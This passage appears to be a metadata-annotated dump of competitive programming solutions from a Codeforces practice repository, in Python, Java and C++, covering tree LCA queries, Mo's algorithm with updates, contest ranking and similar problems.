b)\nprint(a - b)\nprint(a * b)\nif a >= 0 and b >= 0:\n print(a // b, a % b)\nelif a >= 0 and b <= 0:\n print(-(a // abs(b)), a % abs(b))\nelif a <= 0 and b >= 2:\n print(a // b + 1, -(abs(a) % b))\nelif a <= 0 and b <= 1: # -1 1 case is here!\n print(a // b, a % b)\n" }, { "alpha_fraction": 0.6504064798355103, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 19.5, "blob_id": "0df5cdf7105bc86926b4b7ee114aa3e89f897aba", "content_id": "08fe5739c36e62ca6406aa49b776ee111637c684", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 369, "license_type": "no_license", "max_line_length": 67, "num_lines": 18, "path": "/study/task7/Test.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\n\nimport java.io.IOException;\nimport java.util.List;\nimport java.util.Random;\n\npublic class Test {\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tRandom rnd = new Random();\n\t\tList<Digit> d = IOUtils.readDigitSet(\"ann/train\");\n\t\tfor (int i = 0; i < 10; i++) {\n\t\t\t(new SimViz(10, d.get(rnd.nextInt(d.size())))).setVisible(true);\n\t\t}\n\n\t}\n\n}\n" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.6601307392120361, "avg_line_length": 20.571428298950195, "blob_id": "3203bba6703ec1345a3ae5c623ee9586f4c7692f", "content_id": "94eacaefca461112a1b0b0b94071979ca2506905", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 38, "num_lines": 7, "path": "/CodeForce/gym/101090/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "from decimal import *\n\nn, k = list(map(int, input().split()))\ngetcontext().prec = k + 10\ngetcontext().rounding = ROUND_FLOOR\n\nprint(Decimal(n).sqrt())\n\n\n" }, { "alpha_fraction": 0.41129180788993835, "alphanum_fraction": 0.4266398549079895, "avg_line_length": 27.957672119140625, "blob_id": 
"647400d91401c91d644dabb2d5e76ea9e7744602", "content_id": "276f8720073d0815b440fc1d729708cdd0add059", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5473, "license_type": "no_license", "max_line_length": 174, "num_lines": 189, "path": "/CodeForce/1702/G2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//lca\nstruct lca\n{\n vector<vector<int>> g, up;\n vector<int> h;\n int n, l;\n\n lca(const vector<vector<int>>& g) //O(n * log(n))\n {\n this->g = g;\n n = SZ(g);\n l = 1;\n while ((1 << l) <= n) ++l;\n h.resize(n, -1);\n up.resize(l + 1, vector<int>(n));\n dfs(0, 0);\n fori(l)\n forj(n)\n up[i + 1][j] = up[i][up[i][j]];\n }\n \n int getParent(int u, int dist) { //O(log(n))\n fori(l)\n if (dist >> i & 1)\n u = up[i][u];\n return u;\n }\n\n void dfs(int u, int p) //O(n)\n {\n h[u] = h[p] + 1;\n up[0][u] = p;\n for (const int& v: g[u])\n if (v != p)\n dfs(v, u);\n }\n\n int get(int a, int b) //O(log(n))\n {\n if (h[a] < h[b]) swap(a, b);\n a = getParent(a, h[a] - h[b]);\n if (a == b) return a;\n ROF(i, l, 0)\n if (up[i][a] != up[i][b])\n a = up[i][a],\n b = up[i][b];\n return up[0][a];\n }\n\n int getChildWithVertex(int a, int b) //O(log(n))\n {\n if (a == b) return -1;\n return getParent(b, h[b] - h[a] - 1);\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vector<vector<int>> g(n);\n fori(n - 1)\n {\n ints(u, v); --u; --v;\n g[u].pb(v);\n g[v].pb(u);\n }\n lca l(g);\n ints(q);\n forn(Q, q)\n {\n ints(k);\n map<int, vector<int>> m;\n fori(k)\n {\n ints(x); --x;\n m[-l.h[x]].pb(x);\n }\n if (k == 1)\n {\n writeln(\"YES\");\n continue;\n }\n auto find = [&](const int& first, const int& second) {\n int cur = l.get(first, second);\n if (cur == first || cur == second)\n return -1;\n return cur;\n };\n bool ok = true;\n bool last = false;\n int first = -1;\n int second = -1;\n for (auto& [h, vs]: m)\n if (vs.size() > 2)\n ok = false;\n else\n {\n for (int u: vs)\n {\n if (last)\n ok = false;\n if (first == -1)\n first = u;\n else\n {\n if (find(u, first) == -1)\n {\n if (second != -1 && find(u, second) == -1)\n {\n int fin = find(first, second);\n if (fin != u)\n ok = false;\n else\n last = true;\n }\n first = u;\n }\n else if (second 
== -1)\n second = u;\n else if (find(u, second) == -1)\n second = u;\n else\n ok = false;\n }\n }\n }\n\n writeln(ok ? \"YES\" : \"NO\");\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.36647579073905945, "alphanum_fraction": 0.40760019421577454, "avg_line_length": 28.121212005615234, "blob_id": "c12cab7525784ca89693c6ac205ab9bf4ed20d48", "content_id": "ddf3a4ba24a65770dee61d59ea66345cc4068e65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1921, "license_type": "no_license", "max_line_length": 98, "num_lines": 66, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.27/H.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\nusing namespace std;\n \n \nbool seg_cross (pair <int, int> p1, pair <int, int> p2){\n int x = p1.first, y = p1.second, x2 = p2.first, y2 = p2.second;\n return ((x < x2 && x2 < y) || (x < y2 && y2 < y) || (x2 < x && x < y2) || (x2 < y && y < y2));\n}\n \nbool f1[100239], f2[100239];\nvector <pair <int, int> 
> a, a1;\npair <int, int> seg [100239];\n \nint scan(vector <pair <int, int> > a)\n{\n int ans = 0, curr = 0;\n sort(a.begin(), a.end());\n for (int i = 0; i < a.size(); ++i) {\n curr += a[i].second;\n ans = max (ans, curr);\n }\n return ans;\n}\n \nint main() {\n // freopen(\"input.in.c\", \"r\", stdin);\n int t, n;\n cin >> t;\n while (t --> 0){\n cin >> n;\n for (int i = 0; i < n; ++i)\n cin >> seg[i].first >> seg[i].second;\n bool ok = seg_cross(seg[0], seg[1]);\n for (int i = 2; i < n; ++i){\n f1[i] = seg_cross(seg[0], seg[i]);\n f2[i] = seg_cross(seg[1], seg[i]);\n }\n bool _f1 = false, _f2 = false;\n for (int i = 2; i < n; ++i){\n if (f1[i] && !f2[i])\n _f1 = true;\n if (!f1[i] && f2[i])\n _f2 = true;\n }\n ok = (ok || (_f1 && _f2));\n for (int i = 0; i < n; ++i){\n a.push_back(make_pair(seg[i].first, 1));\n a.push_back({seg[i].second, -1});\n a1.push_back(make_pair(seg[i].first, 1));\n a1.push_back({seg[i].second, -1});\n }\n // cout << \"pwqw \" << scan(a) << endl;\n if (ok)\n cout << scan(a) << endl;\n else {\n a.push_back({seg[0].first, 1});\n a.push_back({seg[0].second, -1});\n int temp = scan(a);\n a1.push_back({seg[1].first, 1});\n a1.push_back({seg[1].second, -1});\n cout << min(temp, scan(a1)) << endl;\n }\n a.clear();\n a1.clear();\n }\n}" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 12, "blob_id": "994ca49bcbb3b251553297c9bd8820a04cbfa7a6", "content_id": "3430b84da71afce6d61db7c32dbdd65ed585c79e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13, "license_type": "no_license", "max_line_length": 12, "num_lines": 1, "path": "/CodeForce/0952/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print('Odd')\n" }, { "alpha_fraction": 0.510954737663269, "alphanum_fraction": 0.5239084959030151, "avg_line_length": 25.38396644592285, "blob_id": "e6d54ba0589028a00c758da478b487581e92bd05", "content_id": 
"84bd135c9199565f5f29f648493958226327bf1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6253, "license_type": "no_license", "max_line_length": 174, "num_lines": 237, "path": "/CodeForce/0940/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ntemplate<typename T>\nstruct query\n{\n int l;\n int r;\n int i;\n int updates;\n T q;\n\n int lb;\n int rb;\n\n query(int b, int l, int r, int i, int updates, const T& q) : l(l), r(r), i(i), updates(updates), q(q) \n {\n this->lb = l / b;\n this->rb = r / b;\n }\n};\n\ntemplate<typename S, typename T, typename U>\nstruct MOWithUpdates\n{\n int n;\n int b = 0;\n vector<query<T>> queries;\n vector<U> updates;\n vector<S> answers;\n\n const void f(int);\n void (*addLeft)(int);\n void (*addRight)(int);\n void (*delLeft)(int);\n void (*delRight)(int);\n void (*update)(int, int, int, bool, const U&);\n S (*getAnswer)(int, int, const T&);\n\n void addQuery(int l, int r, const T& t) {\n int i = queries.size();\n queries.push_back(query(b, l, r, i, updates.size(), t));\n }\n\n void addUpdate(const U& u) {\n updates.push_back(u);\n }\n\n MOWithUpdates(\n unsigned int maxN,\n unsigned int maxQ,\n void addLeft(int),\n void addRight(int),\n void delLeft(int),\n void delRight(int),\n void update(int, int, int, bool, const U&),\n S getAnswer(int, int, const T&)\n ) {\n queries.reserve(maxQ);\n updates.reserve(maxQ);\n n = maxN;\n b = pow(n, 2. / 3);\n this->addLeft = addLeft;\n this->addRight = addRight;\n this->delLeft = delLeft;\n this->delRight = delRight;\n this->update = update;\n this->getAnswer = getAnswer;\n }\n\n vector<S> go(\n ) {\n answers.resize(queries.size());\n sort(all(queries), [&](const auto& a, const auto& b) {\n if (a.lb != b.lb)\n return a.lb < b.lb;\n if (a.rb != b.rb)\n return a.lb & 1 ? a.rb < b.rb : a.rb > b.rb;\n return a.lb & 1 ^ a.rb & 1 ? 
a.updates < b.updates : a.updates > b.updates;\n });\n\n int L = 0;\n int R = -1;\n int E = 0;\n\n for (const auto& [l, r, id, t, q, _, __]: queries) \n {\n while (E < t) { update(E, L, R, true, updates[E]); ++E; }\n while (E > t) { --E; update(E, L, R, false, updates[E]); }\n while (L > l) addLeft(--L);\n while (R < r) addRight(++R);\n while (L < l) delLeft(L++);\n while (R > r) delRight(R--);\n answers[id] = getAnswer(l, r, q);\n }\n return answers;\n }\n};\n\nmap<int, int> coords;\nvector<int> a;\nvector<int> m;\nvector<int> diffsCNT;\n\nvoid er(int x) {\n --diffsCNT[x];\n}\n\nvoid ad(int x) {\n ++diffsCNT[x];\n}\n\nvoid add(int id) {\n int x = a[id];\n er(m[x]);\n ad(++m[x]);\n}\n\nvoid del(int id) {\n int x = a[id];\n er(m[x]);\n ad(--m[x]);\n}\n\nvoid update(int index, int L, int R, bool forward, const array<int, 3>& update) {\n auto [i, from, to] = update;\n if (!forward) to = from;\n if (L <= i && i <= R)\n del(i);\n a[i] = to;\n if (L <= i && i <= R)\n add(i);\n}\n\nint get(int x) {\n auto it = coords.find(x);\n if (it != coords.end())\n return it->second;\n int sz = coords.size();\n return coords[x] = sz;\n}\n\nint answer(int l, int r, const int&) {\n for (int mex = 1; ; ++mex)\n if (diffsCNT[mex] == 0)\n return mex;\n return -1;\n}\n\n//MO with updates\nvoid run()\n{\n ints(n, q);\n a.resize(n);\n m.resize(n + q + 10);\n diffsCNT.resize(n);\n \n readln(a);\n for (int& x: a)\n x = get(x);\n\n MOWithUpdates<int, int, array<int, 3>> MO(n, q, add, add, del, del, update, answer);\n fori(q)\n {\n ints(type, l, r); --l;\n if (type == 1)\n MO.addQuery(l, --r, 0);\n else\n {\n r = get(r);\n MO.addUpdate({l, a[l], r});\n a[l] = r;\n }\n }\n for (int i = SZ(MO.updates) - 1; i >= 0; --i)\n a[MO.updates[i][0]] = MO.updates[i][1];\n\n auto ans = MO.go();\n for (int& x: ans)\n writeln(x);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << 
\"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.39814406633377075, "alphanum_fraction": 0.40388864278793335, "avg_line_length": 21.83333396911621, "blob_id": "444d1149d18851a364020c3c06d13d0b70b95b8c", "content_id": "f27e3468d414c173aebaef78e85f464730b88a7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4526, "license_type": "no_license", "max_line_length": 87, "num_lines": 198, "path": "/trains/trainEpisode6/Solution.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\nimport java.math.BigInteger;\nimport java.util.Map.Entry;\nimport static java.lang.Math.*;\n\npublic class Solution\n{\n int k = 16;\n\n class Team implements Comparable<Team>\n {\n String name;\n int time, n;\n int[] l = new int[k];\n int[] count = new int[k];\n int[] ac = new int[k];\n boolean[] solved = new boolean[k];\n\n public Team(String name)\n {\n this.name = name;\n time = 0;\n }\n\n @Override\n public int compareTo(Team t)\n {\n int cmp = f(this, t);\n if (cmp != 0)\n return cmp;\n return name.compareTo(t.name);\n }\n }\n\n int f(Team a, Team b)\n {\n int cmp = Integer.compare(b.n, a.n);\n if (cmp != 0)\n 
return cmp;\n cmp = Integer.compare(a.time, b.time);\n if (cmp != 0)\n return cmp;\n for (int i = a.n; i >= 0; --i)\n {\n cmp = Integer.compare(a.ac[i], b.ac[i]);\n if (cmp != 0)\n return cmp;\n cmp = Integer.compare(a.l[i], b.l[i]);\n if (cmp != 0)\n return cmp;\n }\n return 0;\n }\n\n void run()\n {\n int tests = nextInt();\n\n while (--tests >= 0)\n {\n int n = nextInt(), m = nextInt();\n Team[] team = new Team[n];\n Map<String, Integer> id = new HashMap<String, Integer>(n + 3);\n for (int i = 0; i < n; i++)\n {\n String s = next();\n team[i] = new Team(s);\n id.put(s, i);\n }\n\n while (--m >= 0)\n {\n int time = nextInt();\n int i = id.get(next());\n int problem = next().codePointAt(0) - 'A';\n boolean ok = next().equals(\"accepted\");\n if (ok)\n {\n if (team[i].solved[problem])\n continue;\n team[i].solved[problem] = true;\n team[i].time += time + team[i].count[problem] * 20;\n team[i].ac[team[i].n] = time;\n team[i].l[team[i].n++] = team[i].time;\n\n }\n else\n team[i].count[problem]++;\n }\n Arrays.sort(team);\n\n for (int i = 0, j = 0; i < n; i++)\n {\n if (i == 0 || f(team[i], team[i - 1]) != 0)\n out.print(j = i + 1);\n else\n out.print(j);\n out.println(\" \" + team[i].name + \" \" + team[i].n + \" \" + team[i].time);\n }\n }\n\n }\n\n int[][] nextMatrix(int n, int m)\n {\n int[][] matrix = new int[n][m];\n\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n {\n matrix[i][j] = nextInt();\n }\n\n return matrix;\n }\n\n String next()\n {\n while (!st.hasMoreTokens())\n {\n st = new StringTokenizer(nextLine());\n }\n\n return st.nextToken();\n }\n\n boolean hasNext()\n {\n while (!st.hasMoreTokens())\n {\n String line = nextLine();\n\n if (line == null)\n {\n return false;\n }\n\n st = new StringTokenizer(line);\n }\n\n return true;\n }\n\n int[] nextArray(int n)\n {\n int[] array = new int[n];\n\n for (int i = 0; i < n; i++)\n {\n array[i] = nextInt();\n }\n\n return array;\n }\n\n int nextInt()\n {\n return Integer.parseInt(next());\n }\n\n 
long nextLong()\n {\n return Long.parseLong(next());\n }\n\n double nextDouble()\n {\n return Double.parseDouble(next());\n }\n\n String nextLine()\n {\n try\n {\n return in.readLine();\n }\n catch (IOException err)\n {\n return null;\n }\n }\n\n static PrintWriter out;\n static BufferedReader in;\n static StringTokenizer st = new StringTokenizer(\"\");\n static Random rnd = new Random();\n\n public static void main(String[] args) throws IOException\n {\n out = new PrintWriter(System.out);\n // out = new PrintWriter(new File(\"hc.txt\"));\n in = new BufferedReader(new InputStreamReader(System.in));\n new Solution().run();\n out.close();\n in.close();\n }\n}\n\n\n\n\n\n" }, { "alpha_fraction": 0.45922499895095825, "alphanum_fraction": 0.46876806020736694, "avg_line_length": 37.42222213745117, "blob_id": "6ecabf71b0b30403c7e0e3adadaef414ad353651", "content_id": "821f1c8361d1efffb85aaae260d576f7f6809579", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3458, "license_type": "no_license", "max_line_length": 928, "num_lines": 90, "path": "/CodeForce/0391/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", 
a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');}\n\nint n, m, k;\nvector<pii> a;\n\nvoid run()\n{\n readln(n, k);\n int x, y;\n ll sum = 0ll;\n fori(n)\n readln(x, y),\n a.pb({x, y}),\n sum += y;\n ll ans = 0ll;\n int current = 0, rr;\n forn(wwww, max(1, n - 1))\n {\n n = a.size();\n sort(a.begin() + current, a.end());\n fori(n)\n cout << a[i].first << \" \" << a[i].second << endl;\n if (k == n + 1 || k == 1 || n < a[n - k].first - current)\n {\n if (k == n + 1)\n cout << 0 << endl;\n else\n if (n < a[n - k].first - current)\n cout << \"-1\\n\";\n else\n if (k == 1)\n cout << sum << endl;\n return;\n }\n int need = a[n - k].first - current;\n bool flag = false;\n writeln(need);\n if (need == 0)\n flag = true,\n need++;\n// cout << ans << endl;\n sort(a.begin() + current, a.end(), [](pii q, pii w){return q.second < w.second;});\n fori(need)\n ans += a[i + current].second;\n for(int i = need; i < n; i++)\n a[i].first++;\n// a.erase(a.begin(), a.begin() + need);\n rr = current;\n current += need;\n if (flag)\n {\n int mx = 0;\n fori(rr)\n mx = max(mx, a[i].second);\n ans -= mx;\n break;\n }\n }\n cout << ans << endl;\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4973627030849457, "alphanum_fraction": 0.5147378444671631, "avg_line_length": 40.32051467895508, "blob_id": "0d57dd33034f788339979dba4514cc951eb911e3", "content_id": "1b5733994c4ae9533e5fbbca63017aa0bf9ca25f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3223, "license_type": "no_license", "max_line_length": 928, "num_lines": 78, "path": "/trash/E218.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <math.h>\n#include <algorithm>\n#include <queue>\n#include <map>\n\n#define enter printf(\"\\n\");\n#define pb 
push_back\n#define ll unsigned long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"start\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');}\n\nvoid wr(vector<ll> &a)\n{\n forn(i, a.size())\n cout << a[i] << \" \";\n enter;\n}\n\nvoid run()\n{\n int n, k, x;\n vector<pair<int, int> > a;\n readln(n);\n forn(i, n)\n scanf(\"%d\", &x),\n a.pb({x, i + 1});\n readln(k);\n sort(a.begin(), a.end());\n vector<ll> sums, all, sums2, all2;\n sums.push_back(0);\n all.push_back(0);\n sums2.push_back(0);\n all2.push_back(0);\n forn(i, n - 1)\n sums.push_back(((ll)(a[i + 1].first - a[i].first)) * (i + 1) + sums.back()),\n all.push_back(all.back() + sums.back()),\n sums2.push_back(((ll)(a[n - i - 1].first - a[n - i - 2].first)) * (i + 1) + sums2.back()),\n all2.push_back(all2.back() + sums2.back());\n reverse(sums2.begin(), sums2.end());\n reverse(all2.begin(), all2.end());\n sums2.pb(0);\n ll mn = all[k - 1], current;\n int index = k - 1;\n for (int i = k; i < n; i++)\n {\n current = (all[i] + all2[i - k + 1] + ((ll)(a[i + 1].first - a[i - k].first)) * (i - k + 1) * (n - i - 1) +\n sums[i - k] * (n - i - 1) + sums2[i + 1] * (i - k + 1) - all2[0]);\n if (current < mn)\n mn = current,\n index = i;\n }\n for (int i = index - k + 1; i <= index; i++)\n printf(\"%d \", a[i].second);\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.362059623003006, "alphanum_fraction": 0.39295393228530884, "avg_line_length": 24.27397346496582, "blob_id": "f4b448a4c1d8a062731ac840c5fe8778a981de16", "content_id": "e5bfd6ac74392a43155da352ca2b1b2285d62f82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1845, "license_type": "no_license", "max_line_length": 75, "num_lines": 73, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.29/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stdio.h>\n#include <queue>\n#include <algorithm>\n#include <cmath>\n\nusing namespace std;\n\nstruct 
